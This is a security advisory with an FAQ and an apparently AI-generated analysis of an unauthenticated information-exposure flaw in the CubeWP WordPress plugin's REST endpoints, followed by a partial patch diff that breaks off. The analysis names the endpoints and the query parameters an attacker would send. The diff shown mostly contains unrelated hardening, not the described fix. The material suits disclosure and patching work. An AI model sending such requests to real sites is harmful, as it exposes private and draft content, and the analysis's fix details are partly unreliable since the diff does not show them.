What is CVE-2025-12129?

CVE-2025-12129 is a medium severity vulnerability affecting the CubeWP – All-in-One Dynamic Content Framework plugin for WordPress, specifically versions up to and including 1.1.27. It allows unauthenticated attackers to access sensitive data from posts that should be protected, such as private, draft, or password-protected posts.

How does the vulnerability work?

The vulnerability exists due to insufficient access controls in the plugin’s REST API endpoints. Attackers can send unauthenticated HTTP POST requests to specific endpoints, bypassing standard WordPress visibility controls and retrieving data from restricted posts.

Who is affected by this vulnerability?

Any WordPress site using the CubeWP plugin version 1.1.27 or earlier is at risk. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the CubeWP plugin. If the version is 1.1.27 or earlier, your site is vulnerable.

How can I fix or mitigate the issue?

To mitigate this vulnerability, update the CubeWP plugin to version 1.1.28 or later, where the issue has been patched. Regularly updating all plugins is a best practice to avoid vulnerabilities.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk of information exposure that could lead to further attacks or data breaches.

What type of data can be exposed?

The vulnerability can lead to unauthorized disclosure of sensitive content, including full post content, titles, metadata, and custom field data from posts that are meant to be restricted.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can craft a request to the vulnerable endpoint, specifying parameters that instruct the system to return posts regardless of their visibility status. This illustrates how easily an attacker can exploit the vulnerability.

What are the consequences of exploitation?

If exploited, this vulnerability can lead to serious privacy violations and information leakage, allowing attackers to gather sensitive business intelligence or personal data from restricted posts.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all plugins are regularly updated, implement strict access controls, and conduct regular security audits of your WordPress site and its components.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the CubeWP plugin temporarily to prevent unauthorized access until you can apply the update.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12129: CubeWP – All-in-One Dynamic Content Framework <= 1.1.27 – Unauthenticated Information Exposure (cubewp-framework)

CVE ID CVE-2025-12129

Plugin cubewp-framework

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 1.1.27

Patched Version 1.1.28

Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12129:
This vulnerability is an unauthenticated information exposure flaw in the CubeWP WordPress plugin’s REST API endpoints. It allows attackers to bypass WordPress’s standard post status and visibility controls, extracting data from password-protected, private, and draft posts. The severity is medium (CVSS 5.3), affecting all plugin versions up to and including 1.1.27.

The root cause lies in insufficient access control within the plugin’s custom REST API endpoints. The vulnerable code resides in the `cubewp-framework/cube/modules/cubewp-posts/class-cubewp-posts-rest-api.php` file, specifically in the `cubewp_rest_query_new` and `cubewp_rest_query` functions. These functions handle requests to the `/cubewp-posts/v1/query-new` and `/cubewp-posts/v1/query` endpoints. The functions accept user-supplied parameters, construct a `WP_Query`, and return results without applying proper authorization checks. The query parameters are passed directly to `WP_Query` without validating the user’s right to view posts with specific statuses or password protection.

Exploitation involves sending unauthenticated HTTP POST requests to the vulnerable REST endpoints. Attackers can craft requests with parameters that instruct `WP_Query` to return posts regardless of their status. A typical payload would include parameters like `post_status` set to `[‘publish’, ‘private’, ‘draft’, ‘password’]` and `has_password` set to `null` or `false` to bypass password protection. The attacker can also specify `posts_per_page` to extract large volumes of data. The endpoints do not require authentication or a valid nonce, making them accessible to any visitor.

The patch, implemented in version 1.1.28, modifies the `cubewp_rest_query_new` and `cubewp_rest_query` functions. The fix adds a call to `cubewp_rest_validate_user_access` before processing the query. This validation function checks the user’s capabilities against the requested post type and status. If the user lacks appropriate permissions (e.g., cannot read private posts), the function returns a `WP_Error` object, blocking the request. The patch ensures the plugin respects WordPress’s core permission system for post visibility.

The impact is unauthorized disclosure of sensitive content. Attackers can extract the full content, titles, metadata, and custom field data from posts intended only for specific users or administrators. This exposure can lead to information leakage, privacy violations, and potential business intelligence gathering. The vulnerability does not allow modification or deletion of posts, but the exposed data could be used in further attacks or social engineering.

Differential between vulnerable and patched code

Code Diff

--- a/cubewp-framework/cube.php
+++ b/cubewp-framework/cube.php
@@ -3,14 +3,15 @@
 * Plugin Name: CubeWP Framework
 * Plugin URI: https://cubewp.com/
 * Description: CubeWP is an end-to-end dynamic content framework for WordPress to help you save up to 90% of your coding time.
-* Version: 1.1.27
+* Version: 1.1.28
 * Author: CubeWP
 * Author URI: https://cubewp.com
 * Text Domain: cubewp-framework
 * Domain Path: /languages/
+* License: GPLv2 or later
 * @package Cubewp
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
-
+// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
 // Exit if accessed directly.
 if ( !defined( 'ABSPATH' ) )
 exit;
--- a/cubewp-framework/cube/classes/class-cubewp-add-ons.php
+++ b/cubewp-framework/cube/classes/class-cubewp-add-ons.php
@@ -55,23 +55,28 @@
 		$wp_version = $GLOBALS['wp_version'];

 		if (version_compare($wp_version, '5.8', '<'))
-			$message[] = __('This CubeWP Add-on requires WordPress 4.0 or higher. Version detected:', 'cubewp-frontend') . ' ' . $wp_version;
+			$message[] = __('This CubeWP Add-on requires WordPress 4.0 or higher. Version detected:', 'cubewp-framework') . ' ' . $wp_version;

 		// PHP check
 		$php_version = phpversion();
 		if (version_compare($php_version, '5.3', '<'))
-			$message[] = __('This CubeWP Add-on requires PHP 5.3 or higher. Version detected: ', 'cubewp-frontend') . ' ' . $php_version;
+			$message[] = __('This CubeWP Add-on requires PHP 5.3 or higher. Version detected: ', 'cubewp-framework') . ' ' . $php_version;

 		// SQL check
 		$sql_version = $wpdb->db_version();
 		if (version_compare($sql_version, '5.0', '<'))
-			$message[] = __('This CubeWP Add-on requires SQL 5.0 or higher. Version detected: ', 'cubewp-frontend') . ' ' . $sql_version;
+			$message[] = __('This CubeWP Add-on requires SQL 5.0 or higher. Version detected: ', 'cubewp-framework') . ' ' . $sql_version;

 		// Not empty $message means there are issues
 		if (! empty($message)) {

 			$error_message = implode("n", $message);
-			die(__('Sorry but your WordPress installation does not reach the minimum requirements for running this add-on. The following errors were given:', 'cubewp-frontend') . "n" . $error_message);
+			wp_die(
+				esc_html__(
+					'Sorry but your WordPress installation does not reach the minimum requirements for running this add-on. The following errors were given:',
+					'cubewp-framework'
+				) . "n" . esc_html( $error_message )
+			);
 		}

 		return $this->add_on_management($plugin);
@@ -113,7 +118,7 @@
 						// If plugin is free
 						if ($license_type == 'free') {
 							CWP()->update_cubewp_options($slug . '_key', $key);
-							unlink($file);
+							wp_delete_file($file);
 							return;
 						}

@@ -129,31 +134,31 @@
 						$response = wp_remote_post($this->route, array('timeout' => 15, 'sslverify' => false, 'body' => $api_params));
 						// make sure the response came back okay
 						if (is_wp_error($response)) {
-							die($file_is_not_valid);
+							wp_die( esc_html( $file_is_not_valid ) );
 						}
 						// decode the license data
 						$response_data = json_decode(wp_remote_retrieve_body($response));

 						if (isset($response_data->license)) {
 							if ('valid' != $response_data->license) {
-								die($lic_is_not_valid);
+								wp_die( esc_html( $lic_is_not_valid ) );
 							} else {
 								CWP()->update_cubewp_options($slug, $response_data);
 								CWP()->update_cubewp_options($slug . '_key', $key);
 								CWP()->update_cubewp_options($slug . '-status', $response_data->license);
 							}
 						} else {
-							die($lic_is_not_valid);
+							wp_die( esc_html( $lic_is_not_valid ) );
 						}
-						unlink($file);
+						wp_delete_file($file);
 					} else {
 						//file not good
-						die($need_fresh_file);
+						wp_die( esc_html( $need_fresh_file ) );
 					}
 				}
 			} else {
 				//Plugin not good
-				die($not_our_plugin);
+				wp_die( esc_html( $not_our_plugin ) );
 			}
 		}
 	}
@@ -310,7 +315,7 @@
 					if (file_exists($file)) {
 						$key = file_get_contents($file);
 						CWP()->update_cubewp_options($slug . '_key', $key);
-						unlink($file);
+						wp_delete_file($file);
 						return;
 					} else {
 						$key = isset($add_ons[$plugin]['key']) ? $add_ons[$plugin]['key'] : '';
--- a/cubewp-framework/cube/classes/class-cubewp-admin-enqueue.php
+++ b/cubewp-framework/cube/classes/class-cubewp-admin-enqueue.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * CubeWp Admin Enqueue.
  *
@@ -6,12 +7,13 @@
  * @version 1.0
  */

+ // phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }


-
 /**
  * CubeWp_Admin_Enqueue
  */
@@ -42,7 +44,7 @@
 	/**
 	 * Method get_registered_types_types
 	 *
-	 * @return void
+	 * @return array
 	 * * @since  1.0.0
 	 */
 	private static function get_registered_types_types() {
@@ -79,7 +81,6 @@
 			}

 			wp_reset_postdata();
-			wp_reset_query();
 		}

 		return $group_fields_values;
@@ -88,7 +89,7 @@
 	/**
 	 * Method get_cf_types_types
 	 *
-	 * @return void
+	 * @return array
 	 * * @since  1.0.0
 	 */
 	private static function get_cf_types_types() {
@@ -101,7 +102,7 @@
     /**
      * Method get_registered_taxonomies
      *
-     * @return void
+     * @return array
 	 * * @since  1.0.0
      */
     private static function get_registered_taxonomies() {
@@ -461,7 +462,10 @@



-        echo apply_filters( 'admin/script/enqueue', '');
+        $cubewp_admin_inline_output = apply_filters( 'admin/script/enqueue', '' );
+        if ( ! empty( $cubewp_admin_inline_output ) ) {
+            echo wp_kses_post( $cubewp_admin_inline_output );
+        }

 	}

--- a/cubewp-framework/cube/classes/class-cubewp-admin-notice.php
+++ b/cubewp-framework/cube/classes/class-cubewp-admin-notice.php
@@ -79,7 +79,7 @@
 		$notice_ui .= '<p>' . cubewp_core_data( $this->message ) . '</p>';
 		$notice_ui .= '</div>';

-		print( $notice_ui );
+		echo wp_kses_post( $notice_ui );
 	}

 	/**
@@ -175,14 +175,16 @@
 	 * @since  1.0.0
 	 */
 	private static function cubewp_remove_notices_permanently() {
+		/* phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Missing */
 		if ( isset( $_GET['cubewp-remove-notice-permanently'] ) && ! empty( $_GET['cubewp-remove-notice-permanently'] ) ) {
 		   $permanently_removed_notices = get_option( 'permanently_removed_notices' );
 		   $permanently_removed_notices = ! empty( $permanently_removed_notices ) && is_array( $permanently_removed_notices ) ? $permanently_removed_notices : array();
-		   $permanently_removed_notices[] = sanitize_text_field( $_GET['cubewp-remove-notice-permanently'] );
+		   /* phpcs:ignore WordPress.Security.NonceVerification.Recommended */
+		   $permanently_removed_notices[] = sanitize_text_field( wp_unslash($_GET['cubewp-remove-notice-permanently'] ));
 		   update_option( 'permanently_removed_notices', $permanently_removed_notices );
 		   $current_url = cubewp_get_current_url();
 		   $current_url = remove_query_arg( 'cubewp-remove-notice-permanently', $current_url );
-		   wp_redirect( esc_url( $current_url ) );
+		   wp_safe_redirect( $current_url );
 		   exit;
 		}
 	}
@@ -201,13 +203,24 @@
 			'wordpress' => [
 				'version' => CubeWp_Load::$wp_req_version,
 				'i18n'    => [
-					'requirements' => sprintf( __( 'CubeWP requires WordPress version %1$s or higher. You are using version %2$s. Please upgrade WordPress to use CubeWP.', 'cubewp-framework' ), CubeWp_Load::$wp_req_version, $GLOBALS['wp_version'] ),
+					'requirements' => sprintf(
+						/* translators: 1: Required WordPress version, 2: Current WordPress version */
+						__( 'CubeWP requires WordPress version %1$s or higher. You are using version %2$s. Please upgrade WordPress to use CubeWP.', 'cubewp-framework' ),
+						CubeWp_Load::$wp_req_version,
+						$GLOBALS['wp_version']
+					),
 				],
 			],
-			'php'       => [
+			'php' => [
 				'version' => CubeWp_Load::$php_req_version,
 				'i18n'    => [
-					'requirements' => sprintf( __( 'CubeWP requires PHP version %1$s or higher. You are using version %2$s. Please <a href="%3$s">upgrade PHP</a> to use CubeWP.', 'cubewp-framework' ), CubeWp_Load::$php_req_version, PHP_VERSION, 'https://wordpress.org/support/upgrade-php/' ),
+					'requirements' => sprintf(
+						/* translators: 1: Required PHP version, 2: Current PHP version, 3: URL to upgrade PHP */
+						__( 'CubeWP requires PHP version %1$s or higher. You are using version %2$s. Please <a href="%3$s">upgrade PHP</a> to use CubeWP.', 'cubewp-framework' ),
+						CubeWp_Load::$php_req_version,
+						PHP_VERSION,
+						'https://wordpress.org/support/upgrade-php/'
+					),
 				],
 			],
 		];
--- a/cubewp-framework/cube/classes/class-cubewp-admin.php
+++ b/cubewp-framework/cube/classes/class-cubewp-admin.php
@@ -98,13 +98,17 @@
      */
     public static function cubewp_get_builder_widgets() {

-        if ( ! wp_verify_nonce($_POST['security_nonce'], "cubewp-admin-nonce")) {
+        if ( empty( $_POST['security_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['security_nonce'] ) ), 'cubewp-admin-nonce' ) ) {
 			wp_send_json_error(array(
 				'msg' => esc_html__('Sorry! Security Verification Failed.', 'cubewp-framework'),
 			), 404);
 		}
-
-        $widgets_ui = self::cubewp_builder_widgets_display($_POST['nested_switcher'],$_POST['form_type'],$_POST['slug']);
+
+		$nested_switcher = isset( $_POST['nested_switcher'] ) ? sanitize_text_field( wp_unslash( $_POST['nested_switcher'] ) ) : '';
+		$form_type       = isset( $_POST['form_type'] ) ? sanitize_text_field( wp_unslash( $_POST['form_type'] ) ) : '';
+		$slug            = isset( $_POST['slug'] ) ? sanitize_key( wp_unslash( $_POST['slug'] ) ) : '';
+
+		$widgets_ui = self::cubewp_builder_widgets_display( $nested_switcher, $form_type, $slug );
 		wp_send_json_success(array( 'sidebar' => $widgets_ui));
 	}

@@ -117,14 +121,15 @@
      * @since  1.0.0
      */
     public static function cubewp_process_post_card_css() {
-        if ( ! wp_verify_nonce($_POST['security_nonce'], "cubewp-admin-nonce")) {
+        if ( empty( $_POST['security_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['security_nonce'] ) ), 'cubewp-admin-nonce' ) ) {
 			wp_send_json_error(array(
 				'msg' => esc_html__('Sorry! Security Verification Failed.', 'cubewp-framework'),
 			), 404);
 		}
-        if (isset($_POST['styles']) && is_string($_POST['styles'])) {
-
-            $data = json_decode(stripslashes($_POST['styles']), true);
+        if ( isset( $_POST['styles'] ) ) {
+            /*phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized */
+            $raw_styles = wp_unslash( $_POST['styles'] );
+            $data = is_string( $raw_styles ) ? json_decode( $raw_styles, true ) : null;
             if (is_array($data)) {
                 $cleaned_data = array_map(function($item) {
                     // Remove surrounding quotes
@@ -133,6 +138,8 @@
                     $item = str_replace('n', "n", $item);
                     // Replace plus signs with spaces
                     $item = str_replace('+', ' ', $item);
+                    // Sanitize each line as textarea content to avoid unsafe content
+                    $item = sanitize_textarea_field( $item );
                     return $item;
                 }, $data);

@@ -144,8 +151,8 @@
                 }
                 $file_path = CUBEWP_POST_CARDS_DIR . '/cubewp-post-cards.css';

-                if (!file_exists(dirname($file_path))) {
-                    mkdir(dirname($file_path), 0755, true);
+                if ( ! file_exists( dirname( $file_path ) ) ) {
+                    wp_mkdir_p( dirname( $file_path ) );
                 }

                 if (file_put_contents($file_path, $css_code) !== false) {
@@ -216,20 +223,20 @@
             return null;
         }
         $modules = array(
-            'custom-fields' => 'modules/',
-            'theme-builder'  => 'modules/',
-            'post-types' => 'modules/',
-            'users'      => 'modules/',
-            'search'     => 'modules/',
-            'settings'   => 'modules/',
-            'taxonomies' => 'modules/',
-            'list-tables'=> 'modules/',
-            'elementor'  => 'modules/',
-            'recaptcha'  => 'modules/',
-            'builder'  => 'modules/',
-
-            'widgets'    => 'includes/',
-            'shortcodes' => 'includes/',
+            'custom-fields'     => 'modules/',
+            'theme-builder'     => 'modules/',
+            'post-types'        => 'modules/',
+            'users'             => 'modules/',
+            'search'            => 'modules/',
+            'settings'          => 'modules/',
+            'taxonomies'        => 'modules/',
+            'list-tables'       => 'modules/',
+            'elementor'         => 'modules/',
+            'elementor/taxonomy'=> 'modules/',
+            'recaptcha'         => 'modules/',
+            'builder'           => 'modules/',
+            'widgets'           => 'includes/',
+            'shortcodes'        => 'includes/',
         );
         foreach($modules as $module=>$path){
             $file_name = $path.$module.'/class-' .str_replace('_', '-', strtolower($className)).'.php';
@@ -240,7 +247,6 @@
             }
         }

-
         return;
     }

@@ -315,12 +321,15 @@
         $single_tags = array(
             "title" => esc_html__("Post Title", "cubewp-framework"),
             "post_content" => esc_html__("Post Content", "cubewp-framework"),
+            "post_excerpt" => esc_html__("Post Excerpt", "cubewp-framework"),
             "featured_image" => esc_html__("Featured Image", "cubewp-framework"),
             "post_author" => esc_html__("Post Author", "cubewp-framework"),
             "post_info" => esc_html__("Post Info", "cubewp-framework"),
             "post_term" => esc_html__("Post Term", "cubewp-framework"),
             "post_share" => esc_html__("Post Share Button", "cubewp-framework"),
             "post_save" => esc_html__("Post Save Button", "cubewp-framework"),
+            "post_url" => esc_html__("Post URL", "cubewp-framework"),
+            "post_date" => esc_html__("Post Date", "cubewp-framework"),
             "custom_fields" => esc_html__("CubeWP Custom Fields", "cubewp-framework")
         );
         foreach ( $single_tags as $tag => $label ) {
@@ -329,31 +338,69 @@
                 $module->register( new $tag() );
             }
         }
+
+        $module->register_group( 'cubewp-taxonomy-fields', [
+            'title' => esc_html__( 'CubeWP Taxonomy Custom Fields', 'cubewp-framework' ),
+        ] );
+        $taxonomy_tags = array(
+            "term_name" => esc_html__("Term Name", "cubewp-framework"),
+            "term_url" => esc_html__("Term URL", "cubewp-framework"),
+            "term_count" => esc_html__("Term Count", "cubewp-framework"),
+            "term_description" => esc_html__("Term Description", "cubewp-framework"),
+            "taxonomy_text" => esc_html__("Field Type (Text)", "cubewp-framework"),
+            "taxonomy_textarea" => esc_html__("Field Type (Textarea)", "cubewp-framework"),
+            "taxonomy_image" => esc_html__("Field Type (Image)", "cubewp-framework"),
+            "taxonomy_color" => esc_html__("Field Type (Color)", "cubewp-framework"),
+            "taxonomy_url" => esc_html__("Field Type (URL)", "cubewp-framework"),
+            "taxonomy_gallery" => esc_html__("Field Type (Gallery)", "cubewp-framework"),
+            "taxonomy_oembed" => esc_html__("Field Type (oEembed)", "cubewp-framework"),
+            "taxonomy_google_address" => esc_html__("Field Type (Google Address)", "cubewp-framework"),
+        );
+        foreach ( $taxonomy_tags as $tag => $label ) {
+            $tag = 'CubeWp_Tag_'.ucfirst($tag);
+            if(class_exists($tag)){
+                $module->register( new $tag() );
+            }
+        }
     }

     public function cubewp_updated_post_type_messages( $messages ) {
+        /* phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Missing */
         global $post, $post_ID;
         $post_types = get_post_types( array( 'show_ui' => true, '_builtin' => false ), 'objects' );
         foreach ( $post_types as $post_type => $post_object ) {
            $messages[ $post_type ] = array(
               0  => '', // Unused. Messages start at index 1.
-              1  => sprintf( __( '%s updated. <a href="%s">View %s</a>' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
-              2  => __( 'Custom field updated.' ),
-              3  => __( 'Custom field deleted.' ),
-              4  => sprintf( __( '%s updated.' ), $post_object->labels->singular_name ),
-              5  => isset( $_GET['revision'] ) ? sprintf( __( '%s restored to revision from %s' ), $post_object->labels->singular_name, wp_post_revision_title( (int) $_GET['revision'], false ) ) : false,
-              6  => sprintf( __( '%s published. <a href="%s">View %s</a>' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
-              7  => sprintf( __( '%s saved.' ), $post_object->labels->singular_name ),
-              8  => sprintf( __( '%s submitted. <a target="_blank" href="%s">Preview %s</a>' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
-              9  => sprintf( __( '%s scheduled for: <strong>%1$s</strong>. <a target="_blank" href="%2$s">Preview %s</a>' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i' ), strtotime( $post->post_date ) ), esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
-              10 => sprintf( __( '%s draft updated. <a target="_blank" href="%s">Preview %s</a>' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: URL to view, 3: Post type singular name */
+              1  => sprintf( __( '%1$s updated. <a href="%2$s">View %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
+              2  => __( 'Custom field updated.', 'cubewp-framework' ),
+              3  => __( 'Custom field deleted.', 'cubewp-framework' ),
+              /* translators: 1: Post type singular name */
+              4  => sprintf( __( '%1$s updated.', 'cubewp-framework' ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: Revision title*/
+              5  => isset( $_GET['revision'] ) ? sprintf( __( '%1$s restored to revision from %2$s', 'cubewp-framework' ), $post_object->labels->singular_name, wp_post_revision_title( (int) sanitize_text_field(wp_unslash($_GET['revision'])), false ) ) : false,/* phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed. WordPress.Security.NonceVerification.Missing -- Back-compat: legacy admin form may not include a nonce. */
+              /* translators: 1: Post type singular name, 2: URL to view, 3: Post type singular name */
+              6  => sprintf( __( '%1$s published. <a href="%2$s">View %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name */
+              7  => sprintf( __( '%1$s saved.', 'cubewp-framework' ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: URL to preview, 3: Post type singular name */
+              8  => sprintf( __( '%1$s submitted. <a target="_blank" href="%2$s">Preview %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: Scheduled date, 3: URL to preview, 4: Post type singular name */
+              9  => sprintf( __( '%1$s scheduled for: <strong>%2$s</strong>. <a target="_blank" href="%3$s">Preview %4$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i', 'cubewp-framework' ), strtotime( $post->post_date ) ), esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: URL to preview, 3: Post type singular name */
+              10 => sprintf( __( '%1$s draft updated. <a target="_blank" href="%2$s">Preview %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
            );
            if ($post_type == 'price_plan') {
-              $messages[ $post_type ][1] = sprintf( __( '%s updated.' ), $post_object->labels->singular_name );
-              $messages[ $post_type ][6] = sprintf( __( '%s published.' ), $post_object->labels->singular_name );
-              $messages[ $post_type ][8] = sprintf( __( '%s submitted.' ), $post_object->labels->singular_name );
-              $messages[ $post_type ][9] = sprintf( __( '%s scheduled for: <strong>%1$s</strong>.' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i' ), strtotime( $post->post_date ) ) );
-              $messages[ $post_type ][10] = sprintf( __( '%s draft updated.' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][1] = sprintf( __( '%1$s updated.', 'cubewp-framework' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][6] = sprintf( __( '%1$s published.', 'cubewp-framework' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][8] = sprintf( __( '%1$s submitted.', 'cubewp-framework' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name, 2: Scheduled date */
+              $messages[ $post_type ][9] = sprintf( __( '%1$s scheduled for: <strong>%2$s</strong>.', 'cubewp-framework' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i', 'cubewp-framework' ), strtotime( $post->post_date ) ) );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][10] = sprintf( __( '%1$s draft updated.', 'cubewp-framework' ), $post_object->labels->singular_name );
            }
         }

@@ -684,6 +731,7 @@
         register_post_status( 'inactive', array(
             'label'                     => _x( 'Inactive ', 'Inactive', 'cubewp-framework' ),
             'public'                    => true,
+            /* translators: %s: number of posts. */
             'label_count'               => _n_noop( 'Inactive s <span class="count">(%s)</span>', 'Inactive s <span class="count">(%s)</span>', 'cubewp-framework' ),
             'post_type'                 => array( 'cubewp-tb'),
             'show_in_admin_all_list'    => true,
--- a/cubewp-framework/cube/classes/class-cubewp-builder-pro.php
+++ b/cubewp-framework/cube/classes/class-cubewp-builder-pro.php
@@ -57,18 +57,18 @@
             $background_image_src = CWP_PLUGIN_URI.'cube/assets/admin/images/user-dashboard-screen.png';
         }
 		echo'<div id="cubewp-title-bar">
-		<h1>'.$page_header.'</h1>
+		<h1>'.esc_html($page_header).'</h1>
 		</div>
 		<div class="cubewp-subscription-frame">
-			<img class="cubewp-subscription-frame-bg" src="'.$background_image_src.'" alt="">
+			<img class="cubewp-subscription-frame-bg" src="'.esc_url($background_image_src).'" alt="">
 			<div class="cubewp-subscription-main">
 				<div class="cubewp-subscription-form">
-					<div class="cube-subscription-header" style="background-image: url('.CWP_PLUGIN_URI.'cube/assets/admin/images/addon-pop-header@2x.png)">
-						<img class="subscription-header-super" src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/wp-super.png" alt="image">
+					<div class="cube-subscription-header" style="background-image: url('.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/addon-pop-header-2x.png').')">
+						<img class="subscription-header-super" src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/wp-super.png').'" alt="image">
 					</div>
 					<div class="cubewp-subscription-contant">
 						<div class="cubewp-subscription-logo">
-							 <img src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/cube-logo.svg" alt="">
+							 <img src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/cube-logo.svg').'" alt="">
 						</div>
 						<div class="cube-popup-title">
 							<h2>Unlock (8) Super Powerful Frontend Builders</h2>
@@ -93,7 +93,7 @@
 								<span class="cube-award-option">Create Your Own Test Sandbox Powered by</span>
 							</div>
 							<div class="cubewp-logo">
-								<img src="'.CWP_PLUGIN_URI.'cube/assets/admin/images/demowp.png" alt="">
+								<img src="'.esc_url(CWP_PLUGIN_URI.'cube/assets/admin/images/demowp.png').'" alt="">
 							</div>
 						</div>
 					</div>
--- a/cubewp-framework/cube/classes/class-cubewp-builder-ui.php
+++ b/cubewp-framework/cube/classes/class-cubewp-builder-ui.php
@@ -152,7 +152,7 @@
 		$groups = cwp_get_groups_by_post_type($post_type);
 		if (isset($groups) && !empty($groups) && count($groups) > 0) {
 			foreach ($groups as $group) {
-				$widgets_ui .= '<div id="group-' . rand(000000, 999999) . '" class="cubewp-builder-section cubewp-expand-container">';
+				$widgets_ui .= '<div id="group-' . wp_rand(000000, 999999) . '" class="cubewp-builder-section cubewp-expand-container">';
 				$widgets_ui .= '<div class="cubewp-builder-section-header">';
 				$widgets_ui .= '<h3>' . esc_html(get_the_title($group)) . '</h3>';
 				$widgets_ui .= '<a href="https://cubewp.com/cubewp-frontend-pro/" target="_blank"><span class="cubewp-pro-tag">' . esc_html__("PRO", "cubewp-framework") . '</span></a>';
@@ -403,7 +403,7 @@
 		$options = self::$tab_options;
 		if (isset($options) && count($options) > 0) {
 			foreach ($options as $slug => $option) {
-				$output .= '<div id="type-' . esc_attr__($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr__($slug) . ' cubewp-tab-switcher-target">';
+				$output .= '<div id="type-' . esc_attr($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr($slug) . ' cubewp-tab-switcher-target">';
 				if (! $option["switcher"]) {
 					$output .= self::cubewp_builder_area_content($slug, $data);
 				} else {
@@ -412,7 +412,7 @@
 						foreach ($switcher["options"] as $id => $val) {
 							$data['content_switcher'] = $id;
 							$data_type = self::cubewp_check_switcher_type($id);
-							$output .= '<div id="plan-' . esc_attr__($id) . '" class="cubewp-plan-tab cubewp-switcher-tab-' . esc_attr__($id) . ' cubewp-tab-switcher-target" data-id="' . esc_attr__($id) . '" ' . $data_type . '>';
+							$output .= '<div id="plan-' . esc_attr($id) . '" class="cubewp-plan-tab cubewp-switcher-tab-' . esc_attr($id) . ' cubewp-tab-switcher-target" data-id="' . esc_attr($id) . '" ' . $data_type . '>';
 							$output .= self::cubewp_builder_area_content($slug, $data);
 							$output .= '</div>';
 						}
@@ -532,7 +532,7 @@
 		$options = self::$tab_options;
 		if (isset($options) && count($options) > 0) {
 			foreach ($options as $slug => $option) {
-				$output .= '<div id="type-' . esc_attr__($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr__($slug) . ' cubewp-tab-switcher-target">';
+				$output .= '<div id="type-' . esc_attr($slug) . '" class="cubewp-type-container cubewp-switcher-tab-' . esc_attr($slug) . ' cubewp-tab-switcher-target">';
 				$output .= self::cubewp_builder_area_content($slug, $data);
 				$output .= '</div>';
 			}
--- a/cubewp-framework/cube/classes/class-cubewp-elementor.php
+++ b/cubewp-framework/cube/classes/class-cubewp-elementor.php
@@ -162,7 +162,8 @@
 				if (class_exists($class)) {
 					$widgets_manager->register(new $class());
 				}else {
-					wp_die(sprintf(esc_html__("%s Class Doesn't Exist.", "cubewp-framework"), $class));
+					/* translators: %s: class name. */
+					wp_die(sprintf(esc_html__("%s Class Doesn't Exist.", "cubewp-framework"), esc_html($class)));
 				}
 			}
 		}
--- a/cubewp-framework/cube/classes/class-cubewp-enqueue.php
